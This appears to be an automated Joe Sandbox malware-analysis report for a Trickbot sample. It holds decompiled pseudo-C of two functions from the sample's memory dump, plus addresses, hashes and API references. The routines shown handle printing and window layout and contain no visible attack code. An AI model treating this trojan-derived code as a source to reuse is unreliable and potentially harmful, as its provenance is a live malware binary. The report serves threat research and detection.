Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
API String ID: 1105401458-111014456
Opcode ID: cffe92d71e3b01aec802f2bf15d07d601ad0e84d47b7de81477d3db18a110bbf
Instruction ID: 5870e9367237d0ea5be8e25e71417414cc5b7966b73449400b4c290467772ac3
Opcode Fuzzy Hash: cffe92d71e3b01aec802f2bf15d07d601ad0e84d47b7de81477d3db18a110bbf
Instruction Fuzzy Hash: 9A01F735B803067BF6109758EC0AFC73F885B95B44F2409A6F904A20A5E2EC5C08966E

Uniqueness

Uniqueness Score: -1.00%

Function 0043547D, Relevance: 21.5, APIs: 14, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043547D(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				signed int _t227;
				void* _t228;
				CHAR* _t229;
				intOrPtr _t231;
				CHAR* _t232;
				signed int _t233;
				CHAR* _t242;
				CHAR* _t243;
				CHAR* _t253;
				intOrPtr* _t256;
				intOrPtr _t265;
				signed char _t266;
				intOrPtr _t268;
				int _t290;
				int _t296;
				signed int _t300;
				int _t310;
				void* _t323;
				void* _t335;
				void* _t337;
				intOrPtr _t353;
				struct HDC__* _t355;
				intOrPtr _t357;
				signed char _t383;
				void* _t396;
				signed int _t449;
				intOrPtr* _t452;
				intOrPtr* _t455;
				struct _DOCINFOA _t458;
				void* _t460;
				signed char _t461;
				void* _t463;
				void* _t465;
				void* _t466;
				void* _t468;

				E00405340(E00437CF0, _t463);
				_t466 = _t465 - 0x32c;
				_t452 = __ecx;
				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
				E00435B9E(_t463 - 0x80);
				 *(_t463 - 4) = 0;
				if( *((short*)(E0041877F() + 8)) != 0xe108) {
					L6:
					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
					__eflags = _t227;
					if(_t227 != 0) {
						_t229 =  *0x447478; // 0x44748c
						 *(_t463 - 0x3c) = _t229;
						 *(_t463 - 4) = 1;
						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						__eflags =  *(_t231 + 0x14) & 0x00000020;
						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
							L12:
							_t232 =  *0x447478; // 0x44748c
							 *(_t463 - 0x14) = _t232;
							_t233 =  *(_t452 + 0x3c);
							 *(_t463 - 4) = 0xa;
							__eflags = _t233;
							if(_t233 == 0) {
								E004191FC(E00419D7A(_t452), _t463 - 0x14);
							} else {
								E00417FB5(_t463 - 0x14, _t463, _t233 + 0x1c);
							}
							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
							if(__eflags > 0) {
								E00418246(_t463 - 0x14, __eflags, 0x1f);
							}
							_t458 = 0x14;
							E00405360(_t463 - 0x94, 0, _t458);
							_t468 = _t466 + 0xc;
							 *(_t463 - 0x90) =  *(_t463 - 0x14);
							_t242 =  *0x447478; // 0x44748c
							 *(_t463 - 0x94) = _t458;
							 *(_t463 - 0x38) = _t242;
							_t243 =  *(_t463 - 0x3c);
							 *(_t463 - 4) = 0xb;
							__eflags =  *(_t243 - 8);
							if( *(_t243 - 8) != 0) {
								 *(_t463 - 0x8c) = _t243;
								E0041D9E9(_t243, E004181F7(_t463 - 0x38, _t463, 0x104), 0x104);
								_t460 = 0xf049;
							} else {
								 *(_t463 - 0x8c) = 0;
								_t323 = E00415A69( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
								 *(_t463 - 4) = 0xc;
								E00417FB5(_t463 - 0x38, _t463, _t323);
								 *(_t463 - 4) = 0xb;
								E00417EC8(_t463 - 0x18);
								_t460 = 0xf040;
							}
							E00420CA4(_t463 - 0x34);
							__eflags =  *(_t463 - 0x7c);
							 *(_t463 - 4) = 0xd;
							if( *(_t463 - 0x7c) == 0) {
								E00420D5B(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
								 *(_t463 - 0x28) = 1;
							}
							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) == 0) {
								SetAbortProc( *(_t463 - 0x30), E004352F9);
							}
							E0041B815(E004041A9(), 0);
							_push(_t452);
							E00435AEC(_t463 - 0xf0, __eflags);
							_t253 =  *0x447478; // 0x44748c
							 *(_t463 - 0x20) = _t253;
							 *(_t463 - 4) = 0xf;
							E0041B60D(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
							_t256 = E00415A2B( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
							 *(_t463 - 4) = 0x10;
							E0041B60D(_t463 - 0xf0, 0xca,  *_t256);
							 *(_t463 - 4) = 0xf;
							E00417EC8(_t463 - 0x18);
							E00428A52(_t463 - 0x20, _t460,  *(_t463 - 0x38));
							E0041B60D(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
							E0041B7D3(_t463 - 0xf0, 5);
							UpdateWindow( *(_t463 - 0xd4));
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								L27:
								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
								__eflags = _t449 - _t383;
								 *(_t463 - 0x10) = _t449;
								if(_t449 < _t383) {
									 *(_t463 - 0x10) = _t383;
								}
								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
								__eflags =  *(_t463 - 0x10) - _t266;
								if( *(_t463 - 0x10) > _t266) {
									 *(_t463 - 0x10) = _t266;
								}
								__eflags = _t461 - _t383;
								if(_t461 < _t383) {
									_t461 = _t383;
								}
								__eflags = _t461 - _t266;
								if(_t461 > _t266) {
									_t461 = _t266;
								}
								__eflags =  *(_t463 - 0x10) - _t461;
								asm("sbb eax, eax");
								_t268 = (_t266 & 0x000000fe) + 1;
								__eflags =  *(_t463 - 0x10) - 0xffff;
								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
								if(__eflags != 0) {
									_t151 = _t463 - 0x10;
									 *_t151 =  *(_t463 - 0x10) + _t268;
									__eflags =  *_t151;
								} else {
									 *(_t463 - 0x10) = 0xffff;
								}
								E0041C67E(_t463 - 0x20, __eflags, 0xf043);
								__eflags =  *(_t463 - 0x7c);
								 *(_t463 - 0x1c) = 0;
								if( *(_t463 - 0x7c) == 0) {
									__eflags = _t461 -  *(_t463 - 0x10);
									 *(_t463 - 0x6c) = _t461;
									if(_t461 ==  *(_t463 - 0x10)) {
										goto L53;
									} else {
										while(1) {
											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
											__eflags =  *(_t463 - 0x70);
											if( *(_t463 - 0x70) == 0) {
												goto L51;
											}
											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
											_t468 = _t468 + 0xc;
											E0041B60D(_t463 - 0xf0, 0xcc, _t463 - 0x140);
											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
											_t296 = StartPage( *(_t463 - 0x30));
											__eflags = _t296;
											if(_t296 < 0) {
												L50:
												_t452 =  *((intOrPtr*)(_t463 - 0x24));
												 *(_t463 - 0x1c) = 1;
											} else {
												__eflags =  *0x44b360; // 0x1
												_t455 =  *((intOrPtr*)(_t463 - 0x24));
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
												}
												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
												__eflags = EndPage( *(_t463 - 0x30));
												if(__eflags < 0) {
													goto L50;
												} else {
													_t300 = E004352F9(__eflags,  *(_t463 - 0x30), 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L50;
													} else {
														_t452 =  *((intOrPtr*)(_t463 - 0x24));
														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
															continue;
														} else {
														}
													}
												}
											}
											goto L51;
										}
										goto L51;
									}
								} else {
									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
									L51:
									__eflags =  *(_t463 - 0x7c);
									if( *(_t463 - 0x7c) == 0) {
										__eflags =  *(_t463 - 0x1c);
										if( *(_t463 - 0x1c) != 0) {
											AbortDoc( *(_t463 - 0x30));
										} else {
											L53:
											EndDoc( *(_t463 - 0x30));
										}
									}
								}
								E0041B815(E004041A9(), 1);
								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
								E0041907D(_t463 - 0xf0);
								E00420D92(_t463 - 0x34);
							} else {
								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
								__eflags = _t310 - 0xffffffff;
								if(_t310 != 0xffffffff) {
									goto L27;
								} else {
									E0041B815(E004041A9(), 1);
									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
									E0041907D(_t463 - 0xf0);
									E00420D92(_t463 - 0x34);
									_push(0xffffffff);
									_push(0);
									_push(0xf106);
									E00428683(_t463 - 0x34, __eflags);
								}
							}
							 *(_t463 - 4) = 0xe;
							E00417EC8(_t463 - 0x20);
							 *(_t463 - 4) = 0xd;
							 *((intOrPtr*)(_t463 - 0xf0)) = 0x43b58c;
							E00417440(_t463 - 0xf0);
							 *(_t463 - 4) = 0xb;
							E00420DC3(_t463 - 0x34);
							 *(_t463 - 4) = 0xa;
							E00417EC8(_t463 - 0x38);
							 *(_t463 - 4) = 1;
							_t396 = _t463 - 0x14;
						} else {
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								goto L12;
							} else {
								E00417F36(_t463 - 0x1c, _t463, 0xf045);
								 *(_t463 - 4) = 2;
								E00417F36(_t463 - 0x40, _t463, 0xf046);
								 *(_t463 - 4) = 3;
								E00417F36(_t463 - 0x44, _t463, 0xf047);
								 *(_t463 - 4) = 4;
								E00417F36(_t463 - 0x10, _t463, 0xf048);
								_push(0);
								_push( *((intOrPtr*)(_t463 - 0x44)));
								 *(_t463 - 4) = 5;
								_push(6);
								_push( *((intOrPtr*)(_t463 - 0x40)));
								_push( *(_t463 - 0x1c));
								_push(0);
								E00415B1E(_t463 - 0x338);
								 *(_t463 - 4) = 6;
								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
								_t335 = E00415C80(0);
								__eflags = _t335 - 1;
								if(_t335 == 1) {
									_push(_t463 - 0x18);
									_t337 = E00415D5B(_t463 - 0x338);
									 *(_t463 - 4) = 8;
									E00417FB5(_t463 - 0x3c, _t463, _t337);
									 *(_t463 - 4) = 6;
									E00417EC8(_t463 - 0x18);
									 *(_t463 - 4) = 9;
									E00417EC8(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00417440(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00417EC8(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00417EC8(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00417EC8(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									E00417EC8(_t463 - 0x1c);
									goto L12;
								} else {
									 *(_t463 - 4) = 7;
									E00417EC8(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00417440(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00417EC8(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00417EC8(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00417EC8(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									_t396 = _t463 - 0x1c;
								}
							}
						}
						E00417EC8(_t396);
						 *(_t463 - 4) = 0;
						E00417EC8(_t463 - 0x3c);
					}
				} else {
					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0xac));
					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
						L5:
						 *(_t463 - 0x74) = 1;
						goto L6;
					} else {
						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						_t473 =  *((intOrPtr*)(_t357 + 0x10));
						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
							goto L5;
						} else {
							_push(0xffffffff);
							_push(0);
							_push(0xf106);
							E00428683(_t448, _t473);
						}
					}
				}
				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
				_t228 = E00435C26(_t463 - 0x80);
				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
				return _t228;
			}

0x00435482
0x00435487
0x00435490
0x00435495
0x00435498
0x0043549f
0x004354ad
0x00435507
0x0043550f
0x00435515
0x00435517
0x0043551d
0x00435522
0x00435528
0x0043552c
0x0043552f
0x00435533
0x0043567f
0x0043567f
0x00435684
0x00435687
0x0043568a
0x0043568e
0x00435690
0x004356ad
0x00435692
0x00435699
0x00435699
0x004356b8
0x004356bb
0x004356c2
0x004356c2
0x004356cf
0x004356d3
0x004356db
0x004356de
0x004356e4
0x004356e9
0x004356ef
0x004356f2
0x004356f5
0x004356f9
0x004356fc
0x00435730
0x00435749
0x0043574e
0x004356fe
0x00435705
0x0043570b
0x00435714
0x00435718
0x00435720
0x00435724
0x00435729
0x00435729
0x00435756
0x0043575b
0x0043575e
0x00435762
0x00435770
0x00435775
0x00435775
0x00435788
0x0043578e
0x00435791
0x0043579b
0x0043579b
0x004357a9
0x004357ae
0x004357b5
0x004357ba
0x004357bf
0x004357cb
0x004357d4
0x004357e0
0x004357ed
0x004357f6
0x004357fe
0x00435802
0x0043580f
0x00435822
0x0043582f
0x0043583a
0x00435840
0x00435843
0x0043589f
0x004358a2
0x004358a5
0x004358a9
0x004358ad
0x004358b1
0x004358b3
0x004358b6
0x004358b8
0x004358b8
0x004358bb
0x004358bf
0x004358c2
0x004358c4
0x004358c4
0x004358c7
0x004358c9
0x004358cb
0x004358cb
0x004358cd
0x004358cf
0x004358d1
0x004358d1
0x004358d3
0x004358db
0x004358df
0x004358e0
0x004358e3
0x004358e6
0x004358ed
0x004358ed
0x004358ed
0x004358e8
0x004358e8
0x004358e8
0x004358f8
0x004358fd
0x00435900
0x00435903
0x0043592e
0x00435931
0x00435934
0x00000000
0x0043593a
0x00435940
0x0043594c
0x00435952
0x00435955
0x00000000
0x00000000
0x00435968
0x0043596e
0x00435983
0x0043598d
0x004359a0
0x004359af
0x004359b8
0x004359be
0x004359c0
0x00435a22
0x00435a22
0x00435a25
0x004359c2
0x004359c2
0x004359c8
0x004359cb
0x004359d9
0x004359d9
0x004359eb
0x004359fa
0x004359fc
0x00000000
0x004359fe
0x00435a02
0x00435a07
0x00435a09
0x00000000
0x00435a0b
0x00435a0e
0x00435a11
0x00435a17
0x00435a1a
0x00000000
0x00000000
0x00435a20
0x00435a1a
0x00435a09
0x004359fc
0x00000000
0x004359c0
0x00000000
0x00435940
0x00435905
0x00435911
0x00435923
0x00435a2c
0x00435a2c
0x00435a2f
0x00435a31
0x00435a34
0x00435a44
0x00435a36
0x00435a36
0x00435a39
0x00435a39
0x00435a34
0x00435a2f
0x00435a53
0x00435a64
0x00435a70
0x00435a78
0x00435845
0x0043584f
0x00435855
0x00435858
0x00000000
0x0043585a
0x00435863
0x00435874
0x00435880
0x00435888
0x0043588d
0x0043588f
0x00435890
0x00435895
0x00435895
0x00435858
0x00435a80
0x00435a84
0x00435a8f
0x00435a93
0x00435a9d
0x00435aa5
0x00435aa9
0x00435ab1
0x00435ab5
0x00435aba
0x00435abe
0x00435539
0x00435539
0x0043553c
0x00000000
0x00435542
0x0043554a
0x00435557
0x0043555b
0x00435568
0x0043556c
0x00435579
0x0043557d
0x00435582
0x00435589
0x0043558c
0x00435590
0x00435592
0x00435595
0x00435598
0x00435599
0x004355a7
0x004355ab
0x004355b1
0x004355b6
0x004355b9
0x00435612
0x00435613
0x0043561c
0x00435620
0x00435628
0x0043562c
0x00435637
0x0043563b
0x00435646
0x0043564a
0x00435652
0x00435656
0x0043565e
0x00435662
0x0043566a
0x0043566e
0x00435676
0x0043567a
0x00000000
0x004355bb
0x004355c1
0x004355c5
0x004355d0
0x004355d4
0x004355dc
0x004355e0
0x004355e8
0x004355ec
0x004355f4
0x004355f8
0x004355fd
0x00435601
0x00435601
0x004355b9
0x0043553c
0x00435ac1
0x00435ac9
0x00435acc
0x00435acc
0x004354af
0x004354b7
0x004354bf
0x00435500
0x00435500
0x00000000
0x004354c7
0x004354d4
0x004354dd
0x004354e0
0x004354e6
0x004354e9
0x004354ec
0x00000000
0x004354ee
0x004354ee
0x004354f0
0x004354f1
0x004354f6
0x004354f6
0x004354ec
0x004354bf
0x00435ad1
0x00435ad8
0x00435ae3
0x00435aeb

APIs

__EH_prolog.LIBCMT ref: 00435482

Part of subcall function 00435B9E: __EH_prolog.LIBCMT ref: 00435BA3

Part of subcall function 0041877F: GetMessageTime.USER32 ref: 00418791
Part of subcall function 0041877F: GetMessagePos.USER32 ref: 0041879A

CreateDCA.GDI32(?,?,?,00000000), ref: 004354D4
SetAbortProc.GDI32(?,Function_000352F9), ref: 0043579B
UpdateWindow.USER32(?), ref: 0043583A
StartDocA.GDI32(?,?), ref: 0043584F
EndDoc.GDI32(?), ref: 00435A39

Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: e066b5225aa8885517185a7d3892ae13fb6812d348b5eeea089bd5190985030b
Instruction ID: a0dd3e15bf6781a077e23ea59c2ef98f91582c7a5e74925b53bef0c7a4ac1d06
Opcode Fuzzy Hash: e066b5225aa8885517185a7d3892ae13fb6812d348b5eeea089bd5190985030b
Instruction Fuzzy Hash: 5F129C71D0021AEFDF14EFA5C985AEDBBB4BF18308F1040AEE405A3292DB785E44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00427857, Relevance: 21.4, APIs: 14, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00427857(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				struct tagRECT _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				int _v136;
				char _v144;
				intOrPtr* _t191;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr _t213;
				signed int _t215;
				long _t218;
				signed int _t219;
				signed int _t225;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t238;
				intOrPtr _t239;
				int _t244;
				signed int _t245;
				signed int _t249;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t269;
				signed int _t273;
				signed int _t277;
				long _t285;
				void* _t293;
				signed int _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t305;
				long _t312;
				int _t322;
				long _t327;
				signed int _t333;
				intOrPtr _t336;
				RECT* _t341;
				signed int _t342;
				intOrPtr* _t343;
				int _t345;

				_t293 = __ebx;
				_t336 = __ecx;
				_v68 = __ecx;
				_t191 = E00428D38( &_v64, _a8, _a12);
				_t341 = _t336 + 0x94;
				_v12 =  *_t191;
				_v8 =  *((intOrPtr*)(_t191 + 4));
				if(IsRectEmpty(_t341) != 0) {
					GetClientRect( *(E00419D7A(_t336) + 0x1c),  &_v88);
					_t197 = _v88.right - _v88.left;
					_t305 = _v88.bottom - _v88.top;
				} else {
					_t197 = _t341->right - _t341->left;
					_t305 = _t341->bottom - _t341->top;
				}
				_t342 = 0;
				_v48 = _t197;
				_v44 = _t305;
				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
				} else {
					_v136 = 0;
				}
				_t199 =  *0x44b308; // 0x2
				_push(_t293);
				_t294 =  *0x44b30c; // 0x2
				_v40 = _t342;
				_t295 =  ~_t294;
				_v56 =  ~_t199;
				_v36 = _t342;
				_v16 = _t342;
				if( *(_t336 + 0x84) <= _t342) {
					L73:
					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
						EndDeferWindowPos(_v136);
					}
					SetRectEmpty( &_v104);
					E00429BAB(_t336,  &_v104, _a12);
					if(_a8 == _t342 || _a12 == _t342) {
						if(_v12 != _t342) {
							_v12 = _v12 + _v104.left - _v104.right;
						}
					}
					if(_a8 == _t342 || _a12 != _t342) {
						if(_v8 != _t342) {
							_v8 = _v8 + _v104.top - _v104.bottom;
						}
					}
					_t205 = _a4;
					 *_t205 = _v12;
					 *((intOrPtr*)(_t205 + 4)) = _v8;
					return _t205;
				} else {
					do {
						_t343 = E00427E85(_t336, _v16);
						_v72 = _t343;
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
						if(_t343 == 0) {
							if(_t213 != 0) {
								goto L71;
							}
							L58:
							_t215 = _v40;
							if(_t215 != 0) {
								if(_a12 == 0) {
									_t312 = _v56 + _t215 -  *0x44b308;
									_v56 = _t312;
									if(_v12 <= _t312) {
										_v12 = _t312;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t299 =  *0x44b30c; // 0x2
									_t295 =  ~_t299;
								} else {
									_t295 = _t295 + _t215 -  *0x44b30c;
									_t218 = _v56;
									if(_v12 <= _t218) {
										_v12 = _t218;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t219 =  *0x44b308; // 0x2
									_v56 =  ~_t219;
								}
								_v40 = _v40 & 0x00000000;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
							L51:
							if(_v36 != 0) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
							goto L71;
						}
						_t225 =  *(_t343 + 0x64);
						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
						} else {
							_t229 = 6;
						}
						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
						_t327 = _v56;
						_v64 =  *_t231;
						_v60 =  *((intOrPtr*)(_t231 + 4));
						_v32.left = _t327;
						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
						_v32.right =  *_t231 + _t327;
						_v32.top = _t295;
						GetWindowRect( *(_t343 + 0x1c),  &_v88);
						E0042147E(_t336,  &_v88);
						_t322 = 0;
						if(_a12 == 0) {
							_t238 = _v88.top;
							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, 0, _t238 - _v32.top);
								_t322 = 0;
							}
							_t239 = _v32.bottom;
							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
								_t333 = _v44 - _t239 - _v32.top -  *0x44b30c;
								_t256 = _t333;
								if(_t333 <= _t295) {
									_t256 = _t295;
								}
								OffsetRect( &_v32, _t322, _t256 - _v32.top);
								_t322 = 0;
							}
							if(_v36 == _t322) {
								if(_v32.top < _v44 -  *0x44b30c) {
									goto L44;
								}
								_t249 = _v16;
								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x44b30c; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
								L44:
								_t244 = EqualRect( &_v32,  &_v88);
								if(_t244 == 0) {
									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t343 = _v72;
										_t336 = _v68;
									}
									E0041A3D0( &_v136,  *(_t343 + 0x1c),  &_v32);
								}
								_t245 = _v64;
								_t295 = _v32.top -  *0x44b30c + _v60;
								if(_v40 > _t245) {
									goto L52;
								} else {
									_v40 = _t245;
									goto L51;
								}
							}
						} else {
							_t263 = _v88.left;
							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, _t263 - _v32.left, 0);
								_t322 = 0;
							}
							_t264 = _v32.right;
							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
								L22:
								if(_v36 == _t322) {
									if(_v32.left < _v48 -  *0x44b308) {
										L27:
										_t269 = EqualRect( &_v32,  &_v88);
										if(_t269 == 0) {
											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t343 = _v72;
												_t336 = _v68;
											}
											E0041A3D0( &_v136,  *(_t343 + 0x1c),  &_v32);
										}
										_v56 = _v64 -  *0x44b308 + _v32.left;
										_t273 = _v60;
										if(_v40 <= _t273) {
											_v40 = _t273;
										}
										goto L52;
									}
									_t249 = _v16;
									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
										goto L27;
									} else {
										L56:
										_t345 = 1;
										E00416B74(_t336 + 0x7c, _t249, _t322, _t345);
										_v36 = _t345;
										goto L58;
									}
								}
								_t277 =  *0x44b308; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
								goto L27;
							} else {
								_t285 = _v48 - _t264 -  *0x44b308 - _v32.left;
								if(_t285 <= _v56) {
									_t285 = _v56;
								}
								OffsetRect( &_v32, _t285 - _v32.left, _t322);
								_t322 = 0;
								goto L22;
							}
						}
						L71:
						_v16 = _v16 + 1;
					} while (_v16 <  *(_t336 + 0x84));
					_t342 = 0;
					goto L73;
				}
			}

0x00427857
0x00427868
0x0042786d
0x00427871
0x00427878
0x0042787f
0x00427885
0x00427890
0x004278ad
0x004278b9
0x004278bc
0x00427892
0x00427898
0x0042789a
0x0042789a
0x004278bf
0x004278c1
0x004278ca
0x004278cd
0x004278e3
0x004278cf
0x004278cf
0x004278cf
0x004278e9
0x004278ee
0x004278ef
0x004278f5
0x004278fa
0x00427902
0x00427905
0x00427908
0x0042790b
0x00427c71
0x00427c78
0x00427c88
0x00427c88
0x00427c92
0x00427ca1
0x00427ca9
0x00427cb3
0x00427cbb
0x00427cbb
0x00427cb3
0x00427cc1
0x00427ccb
0x00427cd3
0x00427cd3
0x00427ccb
0x00427cd6
0x00427cde
0x00427ce3
0x00427ce7
0x00427911
0x00427911
0x0042791e
0x00427926
0x0042792b
0x0042792e
0x00427bfd
0x00000000
0x00000000
0x00427bff
0x00427bff
0x00427c04
0x00427c0a
0x00427c3c
0x00427c41
0x00427c44
0x00427c46
0x00427c46
0x00427c4c
0x00427c4e
0x00427c4e
0x00427c51
0x00427c57
0x00427c0c
0x00427c12
0x00427c14
0x00427c1a
0x00427c1c
0x00427c1c
0x00427c22
0x00427c24
0x00427c24
0x00427c27
0x00427c2e
0x00427c2e
0x00427c59
0x00427c59
0x00000000
0x00427c04
0x00427940
0x00427b9b
0x00427b9f
0x00000000
0x00000000
0x00427ba5
0x00427bb0
0x00000000
0x00427bb0
0x00427946
0x0042794b
0x0042795d
0x00427961
0x00427951
0x00427953
0x00427953
0x00427972
0x0042797a
0x0042797d
0x00427983
0x0042798f
0x00427992
0x00427999
0x0042799f
0x004279a2
0x004279ae
0x004279b3
0x004279b8
0x00427ac5
